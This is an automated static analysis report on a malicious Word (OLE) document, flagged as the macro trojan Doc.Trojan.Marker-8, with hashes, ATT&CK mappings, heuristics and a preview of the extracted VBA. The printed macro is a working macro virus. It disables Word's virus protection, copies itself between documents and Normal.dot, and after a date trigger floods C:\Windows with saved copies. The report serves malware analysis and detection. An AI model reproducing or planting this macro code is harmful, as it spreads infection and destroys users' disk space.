Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa973a69c7a3702d…

MALICIOUS

Office (OLE)

43.0 KB Created: 1999-06-16 13:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 945e4285fca9e50533f1359faa9ca1cb SHA-1: 383480e748c3dbfeafdc29aef3fc808936d6606e SHA-256: fa973a69c7a3702d0fea36e5f793668becaf440a9d1de2acd127a1ec7e9fc50c
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document with a high-confidence detection for VBA macros and a specific 'Document_Open' macro. The extracted VBA code indicates an attempt to infect the Normal.dot template with a string literal 'la macro de colombia xxa', suggesting a macro-based infection vector. The presence of the 'Document_Open' macro and the infection attempt points towards a malicious document, likely delivered as a spearphishing attachment.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14111 bytes
SHA-256: 922c148d9966ff6bb1806e45a79917257615b3d072eb6f31207e3e4d4453bfc8
Detection
ClamAV: Doc.Trojan.Marker-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub ViewVBcode(): MsgBox "The Visual Basic environment could not be initialized. Please run setup to install it correctly.", vbCritical: End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub Document_close()
  
  On Error GoTo Finm
  If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
      Const exi = "la macro de colombia xxa"
      Dim DInfec, planinfec As Boolean
      Dim Docu, Plan As Object
      Dim modulin, contemodu, Ninfec As String
      Dim Nume As Integer
      Dim Copform As Object
  
   
      Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
      Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
      
      SaveDoc = ActiveDocument.Saved
      Saveplan = NormalTemplate.Saved
   
      DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
      plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)

      'Ninfec = "'" & " "
      
      Options.VirusProtection = False
   
      Nume = Mid(Int(Rnd() * 10), 1, 1)
      Nume = Nume
      nume1 = 7
      Nume2 = 3
      If Nume = nume1 Or Nume = Nume2 Or plainfec = False Then
         If DInfec = True And plainfec = False Then
            On Error Resume Next
            For il = 1 To Plan.CodeModule.CountOfLines
                Plan.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
            'Docu.CodeModule.addfromstring Ninfec
            contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
            Plan.CodeModule.AddFromString contemodu
         End If

         If DInfec = False And plainfec = True Then
            On Error Resume Next
            For il = 1 To Docu.CodeModule.CountOfLines
                Docu.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
           'Plan.CodeModule.addfromstring Ninfec
            contemodu = Plan.CodeModule.Lines(1, Plan.CodeModule.CountOfLines)
            Docu.CodeModule.AddFromString contemodu
         End If
         
         If SaveDoc = True Then ThisDocument.Save
         If SaveDoc = True And plainfec = False Then NormalTemplate.Save
      End If
  End If
    sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
  sd = Trim(sd)
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("*.*" & i & "*.doc"), FileFormat:= _
        wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
   
  Next
  End If
  
  GoTo Finb
  
Finm:
  On Error Resume Next
  For il = 1 To Docu.CodeModule.CountOfLines
    Docu.CodeModule.DeleteLines 1
  Next
  GoTo Finb
Finb:
 On Error Resume Next
End Sub
Private Sub Document_Open()
   On Error Resume Next
   Const exi = "la macro de colombia xxx"
   Dim Docu, Plan As Object
   Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
   If Docu.CodeModule.CountOfLines > 0 Then
     DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
     If DInfec = False Then
        For il = 1 To Docu.CodeModule.CountOfLines
        Docu.CodeModule.DeleteLines 1
      Next
     End If
   End If

   Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
   If Plan.CodeModule.CountOfLines > 0 Then
     plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)
     If plainfec = False Then
        For il = 1 To Plan.CodeModule.CountOfLines
        Plan.CodeModule.DeleteLines 1
      Next
     End If
   End If
End Sub
























Private Sub ToggleButton1_
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.